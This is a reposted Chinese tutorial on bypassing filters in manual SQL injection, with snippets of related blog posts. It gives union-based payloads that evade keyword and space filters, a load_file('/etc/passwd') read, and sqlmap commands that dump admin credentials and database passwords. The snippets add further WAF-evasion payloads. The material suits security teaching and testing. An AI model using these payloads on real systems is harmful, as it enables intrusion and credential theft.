SQL手工注入绕过过滤

最新推荐文章于 2024-08-29 20:15:55 发布

dielongxun4628

最新推荐文章于 2024-08-29 20:15:55 发布

阅读量371

点赞数

文章标签： java python

原文链接：http://www.cnblogs.com/Bloggeng/p/9539719.html

版权

1、考虑闭合：单引号 --> %27 空格-->%20 井号--> %23 ；构造闭合函数 %27teacher%23

2、判断过滤内容：union --> uniunionon ; 联合查询过滤，再un后再加union ；

3、判断列数，使用Union 语法，union 后边语句要与前边已经执行的语句列数相同。

%27/**/ununionion/**/select/**/1/**/%23 判断是否为1列，返回值为错误，空

%27/**/ununionion/**/select/**/1，2/**/%23 判断是否为2列返回值为正常，则union之前的查询语句为两列

4、id=-1 让前边的select 语句执行输出无内容，再往后执行union语句，打印相关文件内容。

使用load_file(‘/etc/passwd’)

%27/**/ununionion/**/select/**/1，load_file("/etc/passwd")/**/%23

5、或者使用sqlmap -u "url" --tamper "space2comment.py, space2hash.py"

6、SQLMAP用法：

（1）判断库：当前库在第一行当前是article

sqlmap.py -u "url" --dbs

（2）判断表名：

sqlmap.py -u "url" --dbs -D article （表名） --tables

（3）判断列名：

sqlmap.py -u "url" --dbs -D article （表名） -T admin --columns

（4）判断值：

sqlmap.py -u "url" --dbs -D article （表名） -T admin -C username, password --dump

（5）判断数据连接用户的密码：sa

sqlmap.py -u "url" --passwords 找到连接密码用 nvicat连接。

转载于:https://www.cnblogs.com/Bloggeng/p/9539719.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

dielongxun4628

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

2021-09-01 网安实验-SQL注入-绕过is_numeric过滤

时光隧道

09-01

4万+

1.在收集信息的过程中发现备份文件.index.php.swp泄漏，我们拿到了源码。记事本打开可以看到代码内容经过分析得到以下信息：注入点id是被is_numeric过滤后，插入到vote表里的。把注入查询语句插入到vote表里，然后又从vote表里取出，形成二次注入。可以考虑用十六进制或者二进制绕过is_numeric，形成SQL注入。这里我们使用火狐的插件hackbar就可以了（在浏览器工具栏的【工具】中），随便选择一部电影并提交：按照图中的顺序将payload进行十六进制处理（前面记

CISP-PTE考前练习-SQL注入

千寻的博客

10-17

4385

常见的SQL注入的总结

参与评论您还未登录，请先登录后发表或查看评论

手工sql注入&&绕过waf &&一个实例分析

蚁景网安学院

09-28

885

这篇文章，将教大家基本的手工sql注入和绕过waf的知识；分享一个实例，为了效果建议读者自己去搭建环境，因为真实环境都不怎么理想。1.sql注入的基础2.sql注入绕过waf3. s...

【SQL注入-绕过篇】

m0_62373986的博客

08-29

1641

绕过\的关键点在于网站在对输入数据进行处理时，只进行了一次URL编码，所以将%25转化成%后，不会再检查后面的%27。1、宽字节注入在上一篇博客讲到，是因%df+%5c结合为一个宽字节因为GBK编码组合成一个汉字，从而使\失效。2、除此之外，若\没有被网站过滤，也可以利用\对字符的转义来进行SQL注入。网站初次检测用户输入%2527，因为URL编码将%25转化成%，此时用户输入未检测到特殊字符，直接将%27输入到数据库中。2、若\没有被过滤，使用\令闭合符失效。1、宽字节绕过(%df%5c)

SQL手工类（过滤）

qq_40268306的博客

03-30

203

1.手工！！！发现union select 被过滤之后通过输入查表字段，发现union select 被过滤了,这是想到用两个union表示重复输入union select后发现空格也被过滤了，继续用两个空格代替一个空格1.查询当前数据库1' unionunion selectselect database()'2.查询数据库中的表1' unionunion selectselect ...

mysql手工注入绕过防火墙_mssql手工注入及绕过术

weixin_39710288的博客

02-06

180

例子：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1【1】首先爆版本：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0报错信息：在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.16...

mssql手工注入及绕过术

weixin_30635053的博客

03-23

130

报错注入： - 例子：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 【1】首先爆版本：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0 报错信息：在将 nvarchar 值 'Microsoft SQL Server 200...

SQL注入：联合查询的三个绕过技巧

qq_68163788的博客

01-26

3155

在SQL注入中，可以利用科学计数法来绕过对输入的限制。例如，可以使用科学计数法来绕过对字符串长度的限制，通过将字符串拆分成多个部分并使用科学计数法来表示。此外，还可以利用数据库的特定特性或语法来替代原始的查询语句，从而执行联合查询或其他恶意操作。另外，还可以尝试利用无列名注入的技巧，通过在原始查询中使用通配符或其他方式来绕过对列名的限制，从而执行恶意操作。

sql注入空格被过滤_网站渗透：SQL注入与WAF绕过思路分享

weixin_39657444的博客

11-16

690

一、前言这个注入是之前做测试时发现的，但是测试的时候发现有防护，但是想想这么个小网站都绕不过，实在不应该啊。开始补充学习各种场景、各种waf绕过姿势，勉勉强强的成功执行我构造的SQL的语句。趁着还有些印象，就写下过程当记录吧，本次全程打码，纯技术分享。二、注入发现首先，网页打开是这样的，好熟悉的表单页面，常规测试一下，XSS、SQL注入，XSS我都玩腻了感觉没啥好研究的。随便碰碰运气测下SQL注入...

SQL注入绕过WAF方法使用

m0_55563900的博客

03-13

2365

介绍WAF WAF (Web Application Firewall, Web应用防火墙)及与其相关的知识，这里利用国际上公认的一种说法: Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专]为Web应用提供保护的一款产品。 WAF可以分为以下几类 1.软件型WAF 以软件形式装在所保护的服务器上的WAF,由于安装在服务器上，所以可以接触到服务器上的文件，直接检测服务器上是否存在WebShell、是否有文件被创建等。 2.硬件型WAF 以硬件形式部署在链路中，支持多种部署方式，当串联到

网络安全CTF竞赛中SQL注入题型解析：常见攻击手法与绕过技巧总结

最新发布

04-20

主要包括无过滤带回显的手工注入、万能密码及其变种、过滤部分字符后的绕过方法、Union联合查询绕过、SQL异或注入以及SQL盲注等六类典型问题。每种类型都配有详细的攻击流程、实际案例和可能用到的工具（如Firefox、...

Sql注入(手工注入思路、绕过、防御)

Naive的博客

09-26

3522

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。

SQL手工注入进阶篇

weixin_38169206的博客

09-23

373

0.前言　　上一篇我们介绍了SQL手工注入的流程以及步骤，但在实际的安全问题以及CTF题目中，查询语句多种多样，而且是肯定会对用户的输入进行一个安全过滤的，而这些过滤并不一定是百分百安全的，如何利用一些技巧绕过一些安全过滤，这就是我们这一篇要介绍的事情。　　如果你还不熟悉SQL注入的流程以及步骤，请先阅读我的上一篇博文。　　文中有误之处，还请各位师傅指出。 1.各种s...

SQL注入过滤限制绕过方法

weixin_30879169的博客

04-28

1288

突然想我们是否可以用什么方法绕过SQL注入的限制呢？到网上考察了一下，提到的方法大多都是针对AND与“’”号和“=”号过滤的突破，虽然有点进步的地方，但还是有一些关键字没有绕过，由于我不常入侵网站所以也不敢对上述过滤的效果进行评论，但是可以肯定的是，效果不会很好…… 经过我的收集，大部分的防注入程序都过滤了以下关键字： and | select | update | chr | delete ...

[转载]深入理解SQL注入绕过WAF和过滤机制

weixin_33991727的博客

06-27

2319

知己知彼，百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了，而且遇到异常输入直接发生重定向。之前对WAF并不太了解，因此趁此...

高级SQL注入：混淆和绕过

kezhen的专栏

08-11

2039

############# 【0×00】 – 简介【0×01】 – 过滤规避（Mysql）【0x01a】 – 绕过函数和关键词的过滤【0x01b】 – 绕过正则表达式过滤【0×02】 – 常见绕过技术【0×03】 – 高级绕过技术【0x03a】 – HTTP参数污染：分离与结合【0x03b】 – HTTP参数参杂【0×04】 – 如何保护你的

sql注入绕过整理（持续更新）

shadow20112011的博客

11-24

1598

sql注入漏洞 sql注入漏洞，是由于代码执行业务逻辑过程中，对客户端的输入没有进行过滤（或者过滤不充分）或者从数据库读取数据未进行必要过滤检查即直接展示到前端页面（二次注入）导致的，针对该漏洞，服务器端或者代理waf（web应用防火墙）会对接收到的注入利用语句进行过滤，本文主要整理了注入过程中遇到的waf注入防护时的一些常用绕过方法，主要利用了数据库特性、加粗样式、编码、进制转换，同义语句或者相...

mysql手工注入绕过_sql注入绕过WAF

weixin_39794734的博客

02-02

877

这几天的CTF题中有好几道题都是sql注入的，但都存在WAF需要绕过，于是整理了一些常见的绕过WAF注入的方法。在现实sql注入中我们也常常碰到WAF，那么掌握常见的绕过很有必要。0x01、手工注入绕过1、大小写混合例如：uNIoN sELecT 1,2,3,4只适用于针对大小写关键字的匹配2、替换关键字例如：UNIunionON SELselectECT 1,2,3,43、使用编码URL编码如：...

MYSQL-手工SQL注入绕过技巧-实战篇

eT48_Sec

12-24

6000

之前遇到一个站点，经检测存在SQL注入，但是有WAF存在，后来知道是绿盟的WEB应用防火墙。后来在社区看到了一篇关于《sql注入绕过技巧》的文章后（原文：http://zone.wooyun.org/content/16772），回过头来重新进行手工，这次总算干掉了WAF。以下是自己对于本次渗透的一些学习笔记，包含一些绕过waf的技巧。首先判断注入点 id=161-(select

手工sql注入常用sql语句绕过

12-27

### 手工SQL注入绕过安全措施的常用技巧 #### 使用特殊字符和编码混淆WAF检测某些Web应用防火墙(WAF)可能无法正确解析特定模式下的输入，从而允许恶意查询通过。例如，在MySQL环境中，`%20union%20a11%23%0a%20select%201,2,3%23`这样的URL编码可以用来规避基本的过滤机制[^1]。 ```sql http://example.com/vuln.php?id=1 UNION ALL SELECT NULL,NULL,'<script>alert(1)</script>' -- ``` 此代码片段展示了如何利用UNION操作符来附加额外的选择语句，并且使用注释符号(`--`)结束原始查询以确保后续部分不会引起语法错误。 #### 利用路径中的关键词触发白名单规则当目标站点配置有基于URL路径的安全策略时，攻击者可以通过构造特殊的请求地址使这些防护失效。比如向URI中加入像`/admin/`, `/manage/`之类的子串可能会让WAF认为这是合法访问而放行[^2]： ```plaintext http://targetsite/path/to/script?param=value&fakepath=admin/ ``` 上述链接里的`fakepath=admin/`参数并没有实际作用于应用程序逻辑处理过程之中；相反地，它是为了迎合WAF内部预设条件所设计出来的欺骗手段之一。 #### 替代关键字实现相同功能为了避免被简单的字符串匹配型防御工具拦截，还可以尝试替换标准SQL命令的关键字形式。例如将`SELECT`变为`SeLeCt`或采用其他大小写组合方式书写，甚至借助数据库特有的函数特性达到目的。 ```sql http://vulnerable-site/search?q=test'/**/or/**/'1'%3d'1 ``` 这里采用了多层嵌套注释的方式（即`/**/`），使得一些较为基础版本的WAF难以有效识别并阻止该类型的注入行为。